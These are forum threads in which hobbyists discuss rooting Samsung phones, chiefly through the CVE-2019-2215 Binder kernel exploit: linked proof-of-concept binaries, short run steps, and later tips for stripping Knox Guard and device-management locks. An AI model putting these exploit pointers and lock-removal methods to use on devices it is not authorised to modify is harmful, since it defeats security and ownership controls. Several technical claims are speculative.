CVE-2019-2215 for root. - Samsung Galaxy S8 Guides, News, & Discussion

Can we use CVE-2019-2215 exploit to gain root?
Here is a list of Phones affected by the hack.
A “non-exhaustive list” of vulnerable phones include:
Pixel 1
Pixel 1 XL
Pixel 2
Pixel 2 XL
Huawei P20
Xiaomi Redmi 5A
Xiaomi Redmi Note 5
Xiaomi A1
Oppo A3
Moto Z3
Oreo LG phones
Samsung S7
Samsung S8
Samsung S9
See the ars article for more details. I wonder if we have a dev willing to turn this into a root app? And what's the eta for that!
https://arstechnica.com/information...ty-that-gives-full-control-of-android-phones/

looks promising from what im reading about it, i have yet to find an application using it to look at though, also, i hardly know how to make a root so dont expect anything from me

There's a POC on the google thread...just need someone to provide the means to root...and/or just write a bit to the correct partition or whatever to enable OEM unlocking:
https://bugs.chromium.org/p/project-zero/issues/detail?id=1942
POC: https://bugs.chromium.org/p/project-zero/issues/attachmentText?aid=414885

Looks promising, sounds like we still need a dev to pick this up. It's all there just needs a properly setup root app and we can gain root.

Here is the poc compiled:
https://drive.google.com/file/d/10kJ9LvWq1AH1wdourLszXDMPSPbMMNXp/view?usp=drivesdk
You have to use an untrusted app i.e android terminal, termux, connectbot etc.. from the app copy it over to the apps home directory.. chmod +x poc3... then ./poc3.. itll tell you kernel was exploited if ur device is vulnerable..
i can confirm p2xl isvulnerable on latest firmware (will be patched in october updates on the pixels)

Dont know if it's possible or not, but I find kinda nonsense to root a device without unlocking bootloader. If you modify something inside the /system partition you need to disable dm-verity as well, for which you also need to flash non-samsung-signed kernel (thats the reason to unlock the bootloader), otherwise the device wont boot.
Also, forget about flashing twrp without UB

bamsbamx said:
Dont know if it's possible or not, but I find kinda nonsense to root a device without unlocking bootloader. If you modify something inside the /system partition you need to disable dm-verity as well, for which you also need to flash non-samsung-signed kernel (thats the reason to unlock the bootloader), otherwise the device wont boot.
Also, forget about flashing twrp without UB
Click to expand...
Click to collapse
I hear you, but if I can just get apps like adaway, titanium backup, etc I'll be happy. There are a lot of apps that need root that I don't also need a custom kernel and don't as far as I know alter the system partition. This limited root was available for many generations of galaxy and note phones.
Front page xda now...
https://www.xda-developers.com/zero...it-google-pixel-huawei-xiaomi-samsung-others/

Confirmed. My kernel is clear and root is planted. I am Verizon Pixel 2 android 10, different device but same. will post the process when i have a moment.

can't wait bought pixel 2 just because posted this

i think the POC is specific to Pixel 2. I tried it on a Pixel and Samsung S8 Active and no go. That said, this looks promising. I'm working on a version that will work with Samsung S8 Active. Wrt to root being useless without an unlocked bootloader - not so. There are ways to persist as root without an unlocked bootloader and writing to /system. Will post more if I get anywhere.

Does anyone know or can help with step by step process of using poc zip.I have pixel 2 and don't know how about using poc zip or process of flashing it,thank you Sean.

petiolarissean said:
Does anyone know or can help with step by step process of using poc zip.I have pixel 2 and don't know how about using poc zip or process of flashing it,thank you Sean.
Click to expand...
Click to collapse
push it to your phone using adb and run it in the shell. if you're vulnerable you should see "Exploited" if you run uname. this is an exploit that can be used to develop a root, but it needs development.

Yup, I was thinking of the same to use this as a root vulnerability..

I tried to use Qu1ckr00t to root the 955u on pie and it didn't work. The POC needs to be modified to support the s8 and its samsung kernel.

The PoC of Hernandez manipulates kernel data structures, the user process credentials, that are protected by Samsung real time kernel protection (RKP). Normally, the PoC should therefore not work on Samsung devices, or am I wrong with that?
The original PoC was reported to work on S8 and S9. But i fear this was only due to the PoC did not trigger RKP. Will have a look at the original PoC, to assess that ...

So mine ends on writev() returns 0x1000 which means I'm not vulnerable correct? Is that just because the poc isn't made to work with my device or am I not vulnerable in general.

We have https://github.com/grant-h/qu1ckr00t
AFAIK It needs to be modified for S8, currently only working for Pixel 2.
@elliwigy can you help here..

updesh94 said:
We have https://github.com/grant-h/qu1ckr00t
AFAIK It needs to be modified for S8, currently only working for Pixel 2.
@elliwigy can you help here..
Click to expand...
Click to collapse
many ppl have already made and posted the poc used there.. u just gotta look around.. but chances r it wont work unless ur device is vulnerable and the poc is tailored to ur kernel/device
i dont own any vulnerable devices so im not working on it personally..

This seems to only be exploitable on Oreo bootloaders.
"ANDROID: binder: remove waitqueue when thread exits." patched the exploit and was added to the G950U kernel when Pie was released.
Therefore, Pie is not exploitable and it seems that anyone running a V6 bootloader will not be able to use this exploit either.
The good news is, if you're running a V5 bootloader, it is theoretically possible to use this exploit. The bad news is I'm using a V6 bootloader. :/

pixlone said:
This seems to only be exploitable on Oreo bootloaders.
"ANDROID: binder: remove waitqueue when thread exits." patched the exploit and was added to the G950U kernel when Pie was released.
Therefore, Pie is not exploitable and it seems that anyone running a V6 bootloader will not be able to use this exploit either.
The good news is, if you're running a V5 bootloader, it is theoretically possible to use this exploit. The bad news is I'm using a V6 bootloader. :/
Click to expand...
Click to collapse
Wow, Thanks for clearing this up, I am on Pie but not sure If I am on the new bootloader or older one as I Never updated when the update mentioned you wont be able to downgrade. ?

Related

Gain Root Access using the Dirty COW method

So, as some here probably know, there was a huge linux kernel vulnerability that was discovered recently, that i *believe* gives every android device root access, called the Dirty COW exploit. I am just wondering if anyone has actually tried applying this to the G5, as imagine it should work with no issues. If not, maybe i will have to look into it a little deeper to see if i can get it working this weekend.
It does work on the VZW G5, but the issue we all need to consider before applying it is how to undo it. Root access alone isn't all that significant if we can't flash an original image (which requires an unlocked bootloader, unless I'm mistaken).
If you modify /system, OTAs won't apply, meaning you're stuck on whatever version you decided to root. This could be pretty terrible, especially for most of us XDA users, who enjoy being on the cutting edge!
phishfi said:
It does work on the VZW G5, but the issue we all need to consider before applying it is how to undo it. Root access alone isn't all that significant if we can't flash an original image (which requires an unlocked bootloader, unless I'm mistaken).
If you modify /system, OTAs won't apply, meaning you're stuck on whatever version you decided to root. This could be pretty terrible, especially for most of us XDA users, who enjoy being on the cutting edge!
Click to expand...
Click to collapse
I don't think an unlocked bootloader is necessary. The G2 and G3 were never unlocked, but all the roms were bumped.
I wonder if the 15A update from today will patch this loophole?
:crying:I would think some type of memory management or memory encryption patch to greatly reduce the chances of successful bit flips!! Verizon kinda sketchy on details, pushed this out rather quick, sure signs of "hmm, maybe I'll wait on this update!!":good:
Is it works on VZW LG G5 ? I need root access, temporary is ok.
I don't feel like messing up my phone until we have a guarantee root and recovery like the g2
Edit heres a video someone made using this to root an HTC since it's kernel based I'm guessing that it should work
https://youtu.be/4xdMteqm994
Sent from darkharbinger81's Verizon lg g5 non rooted yet
I have installed debian on my laptop to try running this method hopefully soon I just hope the laptop I'm using can install the Android sdk or ndk plus my laptop is a 32 bit operating system so we'll see
Sent from darkharbinger81's Verizon lg g5 non rooted yet

Samsung Galaxy J3 Orbit (SM-S367VL) Looking for advice on how to root.

I've looked for quite a while on anything that could help me root the phone, and have had no success with anything. I'm worrying at this point that the bootloader is just locked and have to ask, is there anything else I can do to root this phone? Willing to try pretty much anything, even at risk of bricking it.
Lavitz324 said:
I've looked for quite a while on anything that could help me root the phone, and have had no success with anything. I'm worrying at this point that the bootloader is just locked and have to ask, is there anything else I can do to root this phone? Willing to try pretty much anything, even at risk of bricking it.
Click to expand...
Click to collapse
I'm interested in this too but in all likelihood nobody with the knowledge is even working on it because this is a niche phone.
Locked bootloader..
Well i have this fone now...i bought it because it was a good deal so it seemed..Less than 100$ for fone and service activation plan...I have rooted just about every Samsung i have ever owned...So heres what i have come up with..There is no OEM option in Developer options...On any other samsung fone i always go right into developer options and disable OEM by turning it off...Then i either have used Kingroot apk or Kingoroot apk in the past and they have worked...sometimes u have to find the perfect version to match your android software specifically...Now i have always had huge success with Odin and flashing TWRP via Laptop or Computer via USB connection, but thats something each individual should personally take the time and educate theirselves on just in case... Sorry to say that the Samsung J3 Orbit with Total Wireless and Oreo 8.0 needs a serious look at...
Lavitz324 said:
I've looked for quite a while on anything that could help me root the phone, and have had no success with anything. I'm worrying at this point that the bootloader is just locked and have to ask, is there anything else I can do to root this phone? Willing to try pretty much anything, even at risk of bricking it.
Click to expand...
Click to collapse
Your phone is a 2018 model of the j3. When xda finally makes a J3 (2018) thread i will request for this thread to be moved. Any root methods shown in J3 (2017) are likely not to work anymore since samsung patched the methods used. The only way to root phones now is by buying the U variants of samsung's phones which are only available from samsung's website under unlocked phones. Unlocked phones from samsung have an unlocked bootloader by default.
thepcwiz101 said:
Your phone is a 2018 model of the j3. When xda finally makes a J3 (2018) thread i will request for this thread to be moved. Any root methods shown in J3 (2017) are likely not to work anymore since samsung patched the methods used. The only way to root phones now is by buying the U variants of samsung's phones which are only available from samsung's website under unlocked phones. Unlocked phones from samsung have an unlocked bootloader by default.
Click to expand...
Click to collapse
incorrect statement.
My s9+ is a U varient with no OEM unlock option and did not come from samsung. And my s9+ is still not rootable.
OuijaElite said:
incorrect statement.
My s9+ is a U varient with no OEM unlock option and did not come from samsung. And my s9+ is still not rootable.
Click to expand...
Click to collapse
strange. what is the model number.
thepcwiz101 said:
Your phone is a 2018 model of the j3. When xda finally makes a J3 (2018) thread i will request for this thread to be moved. Any root methods shown in J3 (2017) are likely not to work anymore since samsung patched the methods used. The only way to root phones now is by buying the U variants of samsung's phones which are only available from samsung's website under unlocked phones. Unlocked phones from samsung have an unlocked bootloader by default.
Click to expand...
Click to collapse
U models are normally U.S. models which are locked tight. I run a s8 as my everyday driver which is rooted. The s9 s10 and most other us snapdragon and in this case exynos all are locked tight. And they cannot be rooted as of right now. The sampwn and other samfail do not work anymore. The U model you are referring to is the U.S. sim unlocked model not bootloader. With the S series F is the European bootloader unlocked model I don't know the European letter for J series.
Until some one finds a way to push a rooted system img on stock permissive combination kernel root will not come just like s9 and s10 us models
If these where us snapdragon we could push a rooted system combination file with safestrap just like we do on the newer bootloader on s8 using EDL and Qualcomm 9008
Just had an idea, another thread on this forum a guy says he made a modified version of Odin that can flash mix matched models. So just flash a model version of the j3 orbit that can be rooted or at least oem unlock capable to be able to flash twrp and then be able to root through twrp.
If flashing a j3 with a model number different than sm-367vl would brick it, just extract the .img partitions like boot.img or whatever the partition may be with ubuntu to restore one by one until you find which one makes the phone boot.
I don't know much about phones when it comes to this depth of modification. But I had a lg zone 3 that used this method to turn an unrootable model number version into a different model number that was rootable. Before I flashed the .img partitions of the stock software the screen had lines all over it, so using screen mirroring I was able to root the different model number software then download partition backup and restore app them restore the partitions that were for the original model number.
So basically it took both model numbers and combined some partitions of each to make it work properly.
In my head I can totally see this working. Just depends on how close to the same hardware each model number of the galaxy j3 has i guess.
I wish I would have noticed/seen this a bit sooner.. any progress or luck? I have the j337u ...
I know chimera tool is able to remove Knox kglock oemlock rmm mdm , of which mine shows kglock on, oemlock: on, frplock off. Trying to flash anything gives the error insufficient payment somethin. So there's got to be a way around it. ALSO I found interesting, the FCC id has J337t instead of U ...wonder why that is ...
(Anyone know where I can get stock j260AZ/AIO -notpaid- (cricket) firmware,I've literally checked every where )
We need someone to take that new 0day exploit rootPoC mod it however and release it
Found this [Have not tried it yet]
Came across an article on androidbiits. Not sure it's actually viable. Unfortunately I cant post the direct link until I have enough posts under my belt.
I'm willing to pitch in if someone can point me in the right direction.
Yhuda
How now????You are find How to root this phone????Please add Develop for find How to root Samsung J3 Orbit?!??
For my kglock on, oem lock on j337u, which also has some new mdm / rmm on it from consumer , I used chimera tool to set KGLock to Complete.
This also switched the oem lock to off and show the toggle in Dev ops....
1st flash of magical patched img worked. But after.connectinf.the Wi-Fi , knox enrollment and instantly a sec. Msg popped up and locked up the entire device. No usb connection or.anything.
factory reset
Same Issue,.then locks up
So for try 3, flash the patched boot, let boot.
AS SOON AS ITboots to android, hit the Airplane Mode toggle to activate it to stop Knox Enrollmnt
So er.gont get
was able to unlock the boatloader with comb file that was compatible, flashed stock track phone, updated to 9 pie...
used a gig pressed power button ???
9 pie trac phone j3 orbit
patched AP file with majisk, ran with Odin : says noway fail, I was able to reflash with stock firmware, so it doesn't work on mine...
any other luck
thanks
I would really like to know if anyone has succeeded either rooting or SIM unlocking or flashing with a different firmware on this model.
I was able to access the OEM unlock in my J3 Orbit (SM-S367VL) via factory binary after flashing combination firmware.
That is as far as Ive gotten. I am assuming you would want to run ADB download mode to flash anything as factory binary seems to have some security measures against full bootloader unlock built in

Anyone Tell Me [ How to make Root and TWRP for a specific device ]

Hiee Guys ! I have used lots of android phones since 10 years and also familiar with them . I always try to root every phone but a problem is that every android phone cannot be rooted . So, please anyone tell me that how i can make root for any device and how i can make twrp for any device .
Thank You in Advance......
As far as compiling TWRP, you can start with this thread. Any device such as pixels upgraded to A10 don't have TWRP so because recovery has changed drastically and development of TWRP had not yet caught up.
Root is available for any device that is rootable. Magisk does a pretty good job of covering the bases and is under active development so properly reported issues are generally addressed.
Finding an exploit to be able to root a device is a different matter. Some, like pixels, are straightforward to root since if bought from Google (not a carrier directly) they have unlockable bootloaders allowing the installation of non-stock images. On a device that does not allow the bootloader to be unlocked, an exploit to achieve root must be found. That is often the issue combined with many of these devices do not attract developers to purchase them and thus no attempts are made.
Animesh._.Mamgain said:
Hiee Guys ! I have used lots of android phones since 10 years and also familiar with them . I always try to root every phone but a problem is that every android phone cannot be rooted . So, please anyone tell me that how i can make root for any device and how i can make twrp for any device .
Thank You in Advance......
Click to expand...
Click to collapse
If the device is a device that has a locked bootloader that can not be unlocked, you will not be able to use TWRP. These devices can only be rooted if there is a rooting app or rooting program available for PC or android that has an exploit that works on the device.
If the bootloader is locked, you won't be able to install TWRP or use TWRP to root the device and you will not be able to flash a Magisk patched boot.img to achieve root.
If there are no exploits available that are proven to work on the device, you won't be able to root the device.
Sent from my SM-S767VL using Tapatalk

Root method for Samsung Galaxy Xcover Fieldpro? (SM-G889A)

Anyone know of a working method to root this phone?
I have a few on the AT&T network. I couldn't find a sub-forum here for this specific device.
I am also looking for pointers. Trying to edit my build.prop, but if I can get full on root and recovery, I'd be elated.
it's currently not possible to root xcover fieldpro since rom from this model are unvailable on public, even tools like friya can't download it. original rom are needed to make twrp or patch boot.img wirh magisk
josselin2196 said:
it's currently not possible to root xcover fieldpro since rom from this model are unvailable on public, even tools like friya can't download it. original rom are needed to make twrp or patch boot.img wirh magisk
Click to expand...
Click to collapse
I have the BL5 stock roms and combination files. Had to pay for them. Would love to share them with developers who can cook something up like the cool people did for my S8 Active with that SamFail V2 ROM or whatever. As it stands, even with flashing the combination file that has a passive state on the kernel, still can't get it running for user ways. It's set up for purely development. If you could get me the build number info, I'll try to track down your ROM for ya, found a bunch of them, but only downloaded my own bootloader version so that way, I didn't update bootloader and screw myself.
Only thing I can think of in my mind, is unzipping the ROM and putting in the SU files in all the proper places, zipping it back up, and then flashing it, but unsure if that would even work.
Has anything changed on root options for this device?
There's an XDA thread out for a paid service that was supposed good for up to certain versions of firmware on several Galaxy devices (up to early 2020 and earlier security patches I think).
The guy had listed an Xcover Pro as one of the successes of his patch, so I had hopes.
Since this FieldPro is not even a Snapdragon chipset, but an Exynos, I figured it was less restricted and someone might have heard of an exploit by now.

Question How to root Android 13?

Hi guys, I'm lookin to root my A525F with One UI 5.0
Also looking for necessary files to disable encryption.
Also I've received November Update for my country.
I have done root my A52 4G android 13 with magisk method.
llranga said:
I have done root my A52 4G android 13 with magisk method.
Click to expand...
Click to collapse
Nice.
Can you please share the exact method you carried on?
Follow the guide here to install TWRP and disable force encryption: https://forum.xda-developers.com/t/recovery-official-twrp-3-7-for-galaxy-a52-4g-and-a72-4g.4405751/
After that just flash Magisk.
Greetings to the XDA Team and all the other good people,
I want to root my Samsung Galaxy A52 4G, and just wanted to ask where should I start so I do it successfully, without upside-down moments. I already updated my phone to the latest, so now the phone is running Android 13.
I am a beginner in this, I educated myself from some videos online and on the XDA forum and saw that I can make my device more secure with root, I can disable system and apps trackers.
So my first question is, do I need to downgrade to Android 12 so the success rate becomes higher or I can stick with Android 13 and still get success for the end goal?
My second question is if what I wrote above this is a truth.
The third question is, how do I get my device running again if rooting fails?
The forth question is, can I unroot my device if I want it at some moment?
My fifth and last question is, is rooting worthy and needed so I can achieve my goals?
I still think I know nothing and want to expand my knowledge, so I ask people who are masters in this field to help me out with this, so I can become happier.
​Thanks for considering my request.
- your dear noobie user epeu.​
You can do root your phone. But you should not be panic. carefully read instructions and do it with patient without skipping none of the steps.
I'm also not an expert. but i have done rooting of more than 10 phones without failing.
you have to unlock your boot loader before rooting.
I doubt about your statement about device becomes more secure with root. it depends on what you do alter followed by root. yes you can improve privacy.
also your banking apps may stop work after rooting. so you have to apply necessary modules (security fixes) before get them start working again.
if rooting failed provided phone is not hard bricked, you can flash your original firmware to restore the phone. what i always do is keeping all the original firmware ready with me before doing any rooting.
yes. you can unroot by flashing original firmware.
last question is difficult to answer. majority of people use their phones without rooting. if you want to be different, it's up to you.

Categories

Resources